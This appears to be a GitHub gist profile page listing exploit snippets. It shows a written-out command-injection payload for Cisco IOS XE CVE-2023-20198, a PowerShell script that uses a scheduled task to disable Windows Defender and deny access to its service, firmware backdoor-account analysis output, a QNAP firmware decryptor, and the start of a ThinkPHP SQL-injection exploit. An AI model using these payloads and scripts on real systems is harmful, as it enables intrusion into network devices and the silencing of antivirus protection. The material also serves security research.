Skip to content

Instantly share code, notes, and snippets.

View imjdl's full-sized avatar
🎯
Focusing

soap imjdl

🎯
Focusing
  • https://rustlang.rs
View GitHub Profile
@imjdl
imjdl / qnap-qts-fw-cryptor.py
Created May 10, 2024 14:18 — forked from ulidtko/qnap-qts-fw-cryptor.py
QNAP QTS firmware encryptor/decryptor.
#!/usr/bin/env python3
import os, sys
import argparse
import struct
from functools import reduce
"""
QNAP QTS firmware encryptor/decryptor.
Based on https://pastebin.com/KHbX85nG
@imjdl
imjdl / gist:779b64aadbaa5382869c81c4b7664698
Created November 7, 2023 10:54 — forked from rashimo/gist:a0ef01bc02e5e9fdf46bc4f3b5193cbf
Chain of Cisco IOS XE CVE-2023-20198 commands
## a POST request as:
POST /webui/rest/softwareMgmt/installAdd HTTP/1.1
{"filePath": "abc/aaa", "fileSystem": "", "ipaddress": "1:1:1:;id>/bootflash/PaJbOLOT;#", "mode": "tftp", "operation_type": "SMU"}
## then another command with the POC technique:
dir bootflash: | include PaJbOLOT
@imjdl
imjdl / Vmg3312 B10b Firmware 1.00(AAPP.7) backdoor account
Created December 29, 2020 04:29 — forked from numanturle/Vmg3312 B10b Firmware 1.00(AAPP.7) backdoor account
Vmg3312 B10b Firmware Vmg3312 B10b Firmware backdoor account
root@bitforbyte:~/xxx# binwalk 100AAPP7D0.bin
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
131072 0x20000 JFFS2 filesystem, big endian
JFFS2 filesystem extract
total 1492
1049502 drwxr-xr-x 18 root root 4096 Oct 27 23:33 .
@imjdl
imjdl / doh.ps1
Created May 8, 2020 03:39 — forked from tyranid/doh.ps1
Something or other.
$cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)'
$a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline
Register-ScheduledTask -TaskName 'TestTask' -Action $a
$svc = New-Object -ComObject 'Schedule.Service'
$svc.Connect()
$user = 'NT SERVICE\TrustedInstaller'
$folder = $svc.GetFolder('\')
@imjdl
imjdl / exp.py
Created October 19, 2018 07:55
ThinkPHP5.0.14-ThinkPHP5.0.15SQl注入漏洞exp
#!/usr/bin/env python3
# coding = UTF-8
import sys
import requests
import time
from threading import Thread
from threading import Lock
import argparse